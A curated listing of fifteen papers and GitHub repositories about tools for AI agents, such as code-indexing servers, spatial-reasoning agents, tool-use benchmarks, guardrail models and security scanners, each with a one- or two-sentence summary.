Tools
Research papers, repositories, and articles about tools
Showing 15 of 15 items
SpatialClaw: Rethinking Action Interface for Agentic Spatial Reasoning
The authors build SpatialClaw, a code-driven agent that uses a stateful Python kernel plus vision tools to solve 3D and 4D spatial puzzles. It beats prior spatial agents across 20 benchmarks and six vision-language backbones, showing that the action interface design can unlock much stronger spatial reasoning.
DeusData/codebase-memory-mcp
High-performance code intelligence server that indexes repos into a persistent knowledge graph. Lets AI tools query big codebases with fewer tokens and sub-millisecond latency. If you build code agents, this is production-grade infrastructure to borrow. ([github.com](https://github.com/trending?since=daily))
NVIDIA/SkillSpector
SkillSpector scans AI agent skills for security problems, prompt injection vectors, and risky patterns. It aims to become the "lint" tool for agent skill stores as organizations start sharing and reusing skills at scale.
CAR-bench: Evaluating the Consistency and Limit-Awareness of LLM Agents under Real-World Uncertainty
CAR-bench builds an in-car assistant world with messy, ambiguous user requests and many tools. It measures not just if agents finish tasks, but whether they know when they’re out of their depth.
ToolSafe: Enhancing Tool Invocation Safety of LLM-based agents via Proactive Step-level Guardrail and Feedback
ToolSafe builds a guardrail model that watches each tool call an agent plans to make and flags dangerous ones before they run. In tool-using agents under prompt-injection attacks, it slashes harmful calls while slightly improving task success.
usestrix/strix
An "AI hacker" that scans your app for security issues using agents. Shows where security and AI Ops are colliding. Worth studying if you're adding automated testing around LLM apps. ([github.com](https://github.com/trending?since=daily))
microsoft/markitdown
markitdown converts many document formats into clean Markdown, which LLMs handle more reliably. It’s a practical bridge between messy office files and the text-first world most AI models live in.
MASFactory: A Graph-centric Framework for Orchestrating LLM-Based Multi-Agent Systems with Vibe Graphing
Presents a framework that treats an agent swarm as a graph you can design, visualize, and debug. Makes multi-agent systems feel more like building workflows than wiring hacks.
MatchTIR: Fine-Grained Supervision for Tool-Integrated Reasoning via Bipartite Matching
MatchTIR stops treating every step in a tool-using trajectory equally. It uses bipartite matching to match predicted tool traces to gold traces, then assigns rewards per step, making small models competitive with larger ones on long tool-use tasks.
browser-use/video-use
Lets coding agents edit videos programmatically. Bridges dev tooling and media pipelines. If you're eyeing agentic video editing or auto-content workflows, this is a strong starting point. ([github.com](https://github.com/trending?since=daily))
AdaTooler-V: Adaptive Tool-Use for Images and Videos
AdaTooler-V teaches vision-language models when to call external tools, not just how. That cuts unnecessary tool calls, reducing costs while often boosting accuracy on vision tasks.
swisskyrepo/PayloadsAllTheThings
A giant, curated list of exploit payloads and bypass tricks for web security and CTFs. It’s becoming the default knowledge base security-focused AI tools plug into. ([github.com](https://github.com/trending))
nesquena/hermes-webui
A web and mobile-friendly UI for the Hermes agent system. It lets non-engineers spin up task-running agents with a few clicks. If you’re experimenting with agents for teams, this is a fast way to test workflows without writing your own front-end.
dmtrKovalenko/fff.nvim
Fast file-search and context toolkit designed for AI agents and Neovim. Helps agents find the right code spans instead of grepping everything.
Tool-Augmented Spatiotemporal Reasoning for Streamlining Video Question Answering Task
The authors augment multimodal LLMs with a "Video Toolkit" and a STAR (Spatiotemporal Reasoning) framework that orchestrates calls to temporal and spatial tools for video question answering. Instead of treating the video as a black-box embedding, the model actively localizes key regions over time using tools, yielding sizable gains on VideoMME and LongVideoBench when wrapped around GPT-4o.